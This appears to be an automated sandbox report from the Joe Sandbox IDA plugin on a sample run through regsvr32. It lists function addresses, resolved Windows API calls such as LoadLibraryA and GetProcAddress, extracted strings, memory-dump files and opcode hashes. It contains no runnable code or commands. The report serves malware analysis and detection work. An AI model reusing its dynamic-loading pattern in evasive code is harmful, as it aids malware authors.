Opcode ID: 98e88e9b46efe472b83c66d4f78ef5b21155e6349619db10456818f8ed4cf8ab
Instruction ID: eba016def226b632203be364a2cb87224fb777217041663ed807db107748f3bb
Opcode Fuzzy Hash: 98e88e9b46efe472b83c66d4f78ef5b21155e6349619db10456818f8ed4cf8ab
Instruction Fuzzy Hash: FDB19421F1DC5A4BEA9AF75844BA278B6C1EF9A754B4402B9E10ED3383DD1CFC415386

Function 00007FFDA3387F00 Relevance: 21.3, APIs: 14, Instructions: 292
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00007FFDA3387F40
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA3387FE5
GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA338804E
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA3388088
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA33880F1
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA338812B
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA3388192
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA33881CC
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA3388233
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA338826D
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA33882D4
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA338830E
CreateEventW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA338839D
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDA33883AF

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: AddressProc$LibraryLoad$HandleModule$CreateEventObjectSingleWait
String ID:
API String ID: 229642238-0
Opcode ID: 62b12860c9e2652c94a4486b1b70a594db286f786e78e9cf5ef73cdcf5f6392b
Instruction ID: 15486c682527ee3f7393fc7d104aca96cd73f95851c903ed99ad7ed601faae40
Opcode Fuzzy Hash: 62b12860c9e2652c94a4486b1b70a594db286f786e78e9cf5ef73cdcf5f6392b
Instruction Fuzzy Hash: FBC1B221B0EA4642FE54AB61E4207BA6363BF85BC4F448535ED4C6B797DEBFE1048708

Function 00007FFD34367F53 Relevance: 19.3, Strings: 15, Instructions: 540
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD34368395
@3A4, xrefs: 00007FFD343684A7
@3A4, xrefs: 00007FFD343683FB
@3A4, xrefs: 00007FFD34367FA0
@3A4, xrefs: 00007FFD34368465
@3A4, xrefs: 00007FFD343683BF
@3A4, xrefs: 00007FFD34368014
@3A4, xrefs: 00007FFD343685A3
@3A4, xrefs: 00007FFD343680EB
pH4, xrefs: 00007FFD34368435
@3A4, xrefs: 00007FFD34367FD5
@3A4, xrefs: 00007FFD34367F71
@3A4, xrefs: 00007FFD343684D9
@3A4, xrefs: 00007FFD34368517
@3A4, xrefs: 00007FFD34368146

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$pH4
API String ID: 0-1242002959
Opcode ID: 55c15c0c3ba27ff1aaf1e98570df04fc5dd8fbe4647856501332408dd07350a7
Instruction ID: 87973e951ff969aa120b0760cc230baf22a743272df1f75c88aadf0cabeed6fa
Opcode Fuzzy Hash: 55c15c0c3ba27ff1aaf1e98570df04fc5dd8fbe4647856501332408dd07350a7
Instruction Fuzzy Hash: 2012C630A58A5A8FEB58FB18C8E26A8B7E1FB9D754F100179D50DD3291DE3CB841CB85

Function 00007FFD34367CB0 Relevance: 17.9, Strings: 14, Instructions: 443
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@3A4, xrefs: 00007FFD34368395
@3A4, xrefs: 00007FFD343684A7
@3A4, xrefs: 00007FFD34367E35
@3A4, xrefs: 00007FFD343683FB
@3A4, xrefs: 00007FFD34368465
@3A4, xrefs: 00007FFD343683BF
@3A4, xrefs: 00007FFD34367CC7
@3A4, xrefs: 00007FFD343685A3
pH4, xrefs: 00007FFD34368435
@3A4, xrefs: 00007FFD34367E64
@3A4, xrefs: 00007FFD343684D9
@3A4, xrefs: 00007FFD34368517
@3A4, xrefs: 00007FFD34367EAF
@3A4, xrefs: 00007FFD34367D62

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$pH4
API String ID: 0-3047578828
Opcode ID: b46f87fc071cc6666d436242a90f5512118fef7f57c1e1ec1f7b68621d81e522
Instruction ID: 5e185b3116d5aa053b594769fbf6531d22523bf126206e72c20188aba4e6b06f
Opcode Fuzzy Hash: b46f87fc071cc6666d436242a90f5512118fef7f57c1e1ec1f7b68621d81e522
Instruction Fuzzy Hash: C5F1AA30B58A5A8BE758FB18C8E67A4B7E1FB99710F1001B9D54DD3292DE3C7C818B85

Function 00007FFD3435F68F Relevance: 15.5, Strings: 12, Instructions: 490COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3436B040
@3A4, xrefs: 00007FFD3436AF4B
@3A4, xrefs: 00007FFD3436B118
@3A4, xrefs: 00007FFD3436AFA7
@3A4, xrefs: 00007FFD3436AFF2
tL_L, xrefs: 00007FFD3436B06E
@3A4, xrefs: 00007FFD3436B268
@_H4, xrefs: 00007FFD3436B391
@3A4, xrefs: 00007FFD3436B4B0
@3A4, xrefs: 00007FFD3436AF77
@3A4, xrefs: 00007FFD3436B01C
@3A4, xrefs: 00007FFD3436B096

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@_H4$tL_L
API String ID: 0-3408336913
Opcode ID: 7ca1d2524882c5cc3c87ea0f72c84af14259ab612fe2954baefd1b8e795895a5
Instruction ID: 4cd367659d45483b7b930e95967636921f6ea42c3441a7eacebbc7ba6d1d68e8
Opcode Fuzzy Hash: 7ca1d2524882c5cc3c87ea0f72c84af14259ab612fe2954baefd1b8e795895a5
Instruction Fuzzy Hash: 8AE1E721B5C95A4BEB98F71C84F62B877D2FF9A360B4401BAD54EC3282DD3CB8425785

Function 00007FFD3435A5AD Relevance: 14.3, Strings: 11, Instructions: 544COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34371B57
@3A4, xrefs: 00007FFD34371DDF
@3A4, xrefs: 00007FFD34371D74
@3A4, xrefs: 00007FFD34371C5A
@3A4, xrefs: 00007FFD34371ADB
@3A4, xrefs: 00007FFD34371BE1
@3A4, xrefs: 00007FFD34371A37
@3A4, xrefs: 00007FFD34371A76
@3A4, xrefs: 00007FFD34371DA3
@3A4, xrefs: 00007FFD34371D30
@3A4, xrefs: 00007FFD34371B30

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-2822809586
Opcode ID: ea6d8d203fe6bf2097d343a957a52b656e724ef6bac9dfdeaad7548059ce94b3
Instruction ID: ad7cf72743d85d22ee240910835c28bc8ff12834fe18b28feaba6d02fb6a3605
Opcode Fuzzy Hash: ea6d8d203fe6bf2097d343a957a52b656e724ef6bac9dfdeaad7548059ce94b3
Instruction Fuzzy Hash: 3BF1F421B5C94A4FEF88FB1888E66747BD2EF9A314B4042B9D54EC3287DD3CB8425785

Function 00007FFD3435F76D Relevance: 14.2, Strings: 11, Instructions: 410COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343695DF
@3A4, xrefs: 00007FFD343696BD
@3A4, xrefs: 00007FFD34369548
@3A4, xrefs: 00007FFD34369428
@3A4, xrefs: 00007FFD34369671
@3A4, xrefs: 00007FFD343695AF
@3A4, xrefs: 00007FFD3436970D
@3A4, xrefs: 00007FFD3436949B
8#H4, xrefs: 00007FFD34369C91
@3A4, xrefs: 00007FFD34369607
@3A4, xrefs: 00007FFD34369454

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: 8#H4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-4092471185
Opcode ID: bd1e4d7adfe48764cf5984c86a0fd5eb28ba4fff6f93971bab1fc37d5d53035d
Instruction ID: 99efcbbdeb3404476f089cf05cdcf9df6a286978866813bea3540b4a6fc9bb28
Opcode Fuzzy Hash: bd1e4d7adfe48764cf5984c86a0fd5eb28ba4fff6f93971bab1fc37d5d53035d
Instruction Fuzzy Hash: F3C10421B4CA464BFB98FB1884E62B4B7D2EF96360F440179D54DC32D3DD3DB8429A85

Function 00007FFD343693D5 Relevance: 11.5, Strings: 9, Instructions: 297COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343695DF
@3A4, xrefs: 00007FFD343696BD
@3A4, xrefs: 00007FFD34369548
@3A4, xrefs: 00007FFD34369428
@3A4, xrefs: 00007FFD343695AF
@3A4, xrefs: 00007FFD3436970D
@3A4, xrefs: 00007FFD3436949B
@3A4, xrefs: 00007FFD34369607
@3A4, xrefs: 00007FFD34369454

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-546224849
Opcode ID: 4c5105d59c58471479ab1198ef0be1a75a85d8874321b06f7b6a0115de698e02
Instruction ID: 2301612117889a0056167ca38d7774346e2504fe8c690df2504fc3cfdc3bf4b7
Opcode Fuzzy Hash: 4c5105d59c58471479ab1198ef0be1a75a85d8874321b06f7b6a0115de698e02
Instruction Fuzzy Hash: DF91D021B4CA474BEB98BB2884E62B4B3D6EF96360F44017AD54DC32D3DD3DB8429A45

Function 00007FFD3436ADF5 Relevance: 11.5, Strings: 9, Instructions: 270COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3436B040
@3A4, xrefs: 00007FFD3436AF4B
@3A4, xrefs: 00007FFD3436B118
@3A4, xrefs: 00007FFD3436AFA7
@3A4, xrefs: 00007FFD3436AFF2
tL_L, xrefs: 00007FFD3436B06E
@3A4, xrefs: 00007FFD3436AF77
@3A4, xrefs: 00007FFD3436B01C
@3A4, xrefs: 00007FFD3436B096

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$tL_L
API String ID: 0-2331327643
Opcode ID: d38cf3ccd1b5074489ab9e0f10857707c879f97593c344942ca708088fb759a1
Instruction ID: fe142c1167626b911996d4e5be7cc11edba5ec4be6359e9068d832da854b565c
Opcode Fuzzy Hash: d38cf3ccd1b5074489ab9e0f10857707c879f97593c344942ca708088fb759a1
Instruction Fuzzy Hash: A481D521B5C99A4BEB98F71844F55B4B7D1EF9B320F0401BAE54DC3282DE3CB8415786

Function 00007FFD3436AF0C Relevance: 11.5, Strings: 9, Instructions: 212COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3436B040
@3A4, xrefs: 00007FFD3436AF4B
@3A4, xrefs: 00007FFD3436B118
@3A4, xrefs: 00007FFD3436AFA7
@3A4, xrefs: 00007FFD3436AFF2
tL_L, xrefs: 00007FFD3436B06E
@3A4, xrefs: 00007FFD3436AF77
@3A4, xrefs: 00007FFD3436B01C
@3A4, xrefs: 00007FFD3436B096

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4$tL_L
API String ID: 0-2331327643
Opcode ID: d5db170a0d69653516b6e19b3d6e854ffc2af2ff0b2fb9a85f9efb60f48b733b
Instruction ID: ac03495e60a494b6796cef522c4f0a0b3dcc40ed1612485cbc456cb62f2f1ba2
Opcode Fuzzy Hash: d5db170a0d69653516b6e19b3d6e854ffc2af2ff0b2fb9a85f9efb60f48b733b
Instruction Fuzzy Hash: 1D51C361B5C9974BEA98F71844F2674A3C2EF9A760B04017AE54DD32C3DE3CBC425B86

Function 00007FFDA33DF930 Relevance: 9.2, APIs: 6, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA33DFBD0: CreateEventW.KERNEL32(00000000,?,?,00007FFDA33DF95C), ref: 00007FFDA33DFBF8

CloseHandle.KERNEL32 ref: 00007FFDA33DF96D
GetOverlappedResult.KERNEL32 ref: 00007FFDA33DFA3D

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: CloseCreateEventHandleOverlappedResult
String ID:
API String ID: 3756958029-0
Opcode ID: 814235ea1b5f1181f872c8bfe1cb36ca6ba4520b100e86159d2a427416c22418
Instruction ID: a1319c9eb197291ed7ebb42754804b2ecf580493fa0d672c8f123f6a78fe5fd4
Opcode Fuzzy Hash: 814235ea1b5f1181f872c8bfe1cb36ca6ba4520b100e86159d2a427416c22418
Instruction Fuzzy Hash: 45619423F0DE4589FB10AA75C4A13BC2BA2AB157C8F144832DE0D67B97CF3AD5958344

Function 02DD1DC7 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 335libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 02DD20DC

Strings

5\~, xrefs: 02DD209B
@, xrefs: 02DD21CA
5\~, xrefs: 02DD1FD4
d, xrefs: 02DD219A

Memory Dump Source

Source File: 00000009.00000002.3361045403.0000000002D80000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2d80000_regsvr32.jbxd

Similarity

API ID: LibraryLoad
String ID: 5\~$5\~$@$d
API String ID: 1029625771-872558757
Opcode ID: 432abaf52b1931f4a4d756fa3dc7670f7fdf06fad49cd8c3503e079c7b5aee6c
Instruction ID: a3471ae6d8bb8bd3702d89d3c60a5147c92a1e351298a08a78ca10fce65cacfc
Opcode Fuzzy Hash: 432abaf52b1931f4a4d756fa3dc7670f7fdf06fad49cd8c3503e079c7b5aee6c
Instruction Fuzzy Hash: D1A14628A2CF854BDB2C492884B523932D5FB95618FB4555EE8CF82B93D750CD4BC683

Function 00007FFD3435AE2D Relevance: 9.0, Strings: 7, Instructions: 257COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34360C61
@3A4, xrefs: 00007FFD34360D61
@3A4, xrefs: 00007FFD34360E47
@3A4, xrefs: 00007FFD34360D8E
@3A4, xrefs: 00007FFD34360DC0
@3A4, xrefs: 00007FFD34360D19
@3A4, xrefs: 00007FFD34360CA9

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-4027356800
Opcode ID: 2929e1a5f522a8b0e73a21239ee99105427f3c4c0b19aaaea9b7a939dc19b54f
Instruction ID: be63866311efd02ae10366ec6539e1ff4f94f4bc2c478ee8a47566d3bab9a2a4
Opcode Fuzzy Hash: 2929e1a5f522a8b0e73a21239ee99105427f3c4c0b19aaaea9b7a939dc19b54f
Instruction Fuzzy Hash: 6071C721B18E4A4FEB98FB5884E66B9B7E5EF99320F04067AD14DD32C2DE3CB8405745

Function 00007FFD3435F75D Relevance: 9.0, Strings: 7, Instructions: 246COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34361429
@3A4, xrefs: 00007FFD34361402
@3A4, xrefs: 00007FFD343613BD
@3A4, xrefs: 00007FFD343615DA
@3A4, xrefs: 00007FFD34361572
@3A4, xrefs: 00007FFD34361536
@3A4, xrefs: 00007FFD34361458

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-4027356800
Opcode ID: e2d05a9135638adfbfef5fde7fd961100d629e105b332eabde5ceea7baa1ed8f
Instruction ID: fba8c439fdeed456a228bac5473a5078510e0b7bcd451d0a06a4a04adea748c9
Opcode Fuzzy Hash: e2d05a9135638adfbfef5fde7fd961100d629e105b332eabde5ceea7baa1ed8f
Instruction Fuzzy Hash: B8611A31B5CA060BFA58FB1894E75B5B3C5EB8A324F40017DE98EC32C3DD2DB8425686

Function 00007FFD3435AE0D Relevance: 8.9, Strings: 7, Instructions: 166COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD343689D5
@3A4, xrefs: 00007FFD34368A1D
@3A4, xrefs: 00007FFD343689A7
@3A4, xrefs: 00007FFD3436897E
@3A4, xrefs: 00007FFD34368A7C
@3A4, xrefs: 00007FFD34368AAC
@3A4, xrefs: 00007FFD34368AD4

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-4027356800
Opcode ID: fa8fc9ab1e396550a6a2db26ef204062b1e981139df0dca29ea7258005bcdb68
Instruction ID: 53a1466f296de2a6215dded1a3597fa75316ac05e8c14e948a43be2e27e60b57
Opcode Fuzzy Hash: fa8fc9ab1e396550a6a2db26ef204062b1e981139df0dca29ea7258005bcdb68
Instruction Fuzzy Hash: 7641F811B5E98A4BFB98FB5898F55B5A2C1FF9A264F04017AE50CD3283DD2CB8414346

Function 00007FFD3436391C Relevance: 7.8, Strings: 6, Instructions: 307COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34363B0C
@3A4, xrefs: 00007FFD343639A0
@3A4, xrefs: 00007FFD34363A36
@3A4, xrefs: 00007FFD343639C7
@3A4, xrefs: 00007FFD34363A9F
@3A4, xrefs: 00007FFD34363961

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-2151912093
Opcode ID: 2456a22fe7ffe1582ffe1fb700a169b486ff6cb0a1864c25a7cad92434c960f7
Instruction ID: 088bf02b10d8cc64d7b3363d278b567f71196ae5a9a3623b5b004f99b85e7597
Opcode Fuzzy Hash: 2456a22fe7ffe1582ffe1fb700a169b486ff6cb0a1864c25a7cad92434c960f7
Instruction Fuzzy Hash: 76812832B5DA4A0FF758B75C98E61B577D1EB96330B04017AE54EC3283EC2E78424786

Function 00007FFD34366D36 Relevance: 7.8, Strings: 6, Instructions: 250COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34366F1A
@3A4, xrefs: 00007FFD34366E8C
@3A4, xrefs: 00007FFD3436708E
@3A4, xrefs: 00007FFD34366E58
@3A4, xrefs: 00007FFD34366D59
@3A4, xrefs: 00007FFD34366D88

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-2151912093
Opcode ID: 729c99339c0b0ffca71b73fa265f022479b9b7f14004f959530b35c2172b5b83
Instruction ID: 8b5635c06065059d1401e69d005302217de140a14e52be4c1cf8517787a97903
Opcode Fuzzy Hash: 729c99339c0b0ffca71b73fa265f022479b9b7f14004f959530b35c2172b5b83
Instruction Fuzzy Hash: F3918230A5895A8FEB94FB58C4E5BA8B7A1FF99354F4001B9D10DD3292DE3CB8819B41

Function 00007FFD343679D1 Relevance: 7.7, Strings: 6, Instructions: 213COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34367A0A
@3A4, xrefs: 00007FFD34367AF5
@3A4, xrefs: 00007FFD34367BFA
@3A4, xrefs: 00007FFD34367BC4
@3A4, xrefs: 00007FFD34367B59
@3A4, xrefs: 00007FFD34367C57

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-2151912093
Opcode ID: 414fbf0f1787aa8492ec37b19f322f09d57ee3474af487303ed24738da8a9ca3
Instruction ID: 026ee6d781c0ed4cc7e731be2399c57dd28c4b6c996407a3e413c3c516775dad
Opcode Fuzzy Hash: 414fbf0f1787aa8492ec37b19f322f09d57ee3474af487303ed24738da8a9ca3
Instruction Fuzzy Hash: 53717370B5855A4FEB98FB18C8E16A8B3E1FF99310F5001B9D54DD3282DE3CAD819B41

Function 00007FFDA33D9060 Relevance: 7.7, APIs: 5, Instructions: 180COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFDA33D928B
GetLastError.KERNEL32 ref: 00007FFDA33D92A7

Memory Dump Source

Source File: 00000009.00000002.3366806003.00007FFDA3381000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA3380000, based on PE: true

Associated: 00000009.00000002.3366768903.00007FFDA3380000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366884052.00007FFDA3435000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366920816.00007FFDA3436000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3366982519.00007FFDA34D7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367011040.00007FFDA34D8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367039825.00007FFDA34D9000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367066190.00007FFDA34DA000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000009.00000002.3367097471.00007FFDA34DD000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffda3380000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 500c22ea5d1c7f879a626e7af5a88f5d3f78f08348a645fc4fd2ea38574c4cde
Instruction ID: 53db646e5b66054e9a3a1a407c38945ccf4553d3adc6a935eefae31bae4b8884
Opcode Fuzzy Hash: 500c22ea5d1c7f879a626e7af5a88f5d3f78f08348a645fc4fd2ea38574c4cde
Instruction Fuzzy Hash: 26612892F0E95645FB656A2194243B927E26F05BD8F144A31CD4F27BCBEE3FE8418304

Function 00007FFD3435A6A8 Relevance: 7.6, Strings: 6, Instructions: 143COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD3436A96B
@3A4, xrefs: 00007FFD3436A9C9
@3A4, xrefs: 00007FFD3436A999
@3A4, xrefs: 00007FFD3436A8D8
@3A4, xrefs: 00007FFD3436A93E
@3A4, xrefs: 00007FFD3436A908

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-2151912093
Opcode ID: 0233aa3975b400101eaf74561a3ff088f5a90eefdba9c1706d1a51c89f7095ff
Instruction ID: 392560b5238525b1a9641fa6a3dac56f42de594b1e5afbcf65654f47c6ba7a85
Opcode Fuzzy Hash: 0233aa3975b400101eaf74561a3ff088f5a90eefdba9c1706d1a51c89f7095ff
Instruction Fuzzy Hash: F8418231B5899F8BEB54FF5888E52A9B3D1FF8A324F140676E50DD3282DE3CA8419741

Function 00007FFD34365A35 Relevance: 6.7, Strings: 5, Instructions: 426COMMON

Download Yara Rule

Strings

@3A4, xrefs: 00007FFD34372740
@3A4, xrefs: 00007FFD343726C7
@3A4, xrefs: 00007FFD343727A8
@3A4, xrefs: 00007FFD34372718
@3A4, xrefs: 00007FFD3437277D

Memory Dump Source

Source File: 00000009.00000002.3365650854.00007FFD34350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34350000_regsvr32.jbxd

Similarity

API ID:
String ID: @3A4$@3A4$@3A4$@3A4$@3A4
API String ID: 0-4193656703
Opcode ID: 85ef3db7bf604a02f7d99419150aacfec47a9a91eb07b2f843a937ec8992523f
Instruction ID: 215ffdd627c79ea2948686c05136c06ea2e0c28dbd6c0af6418cf717c8e10e1b
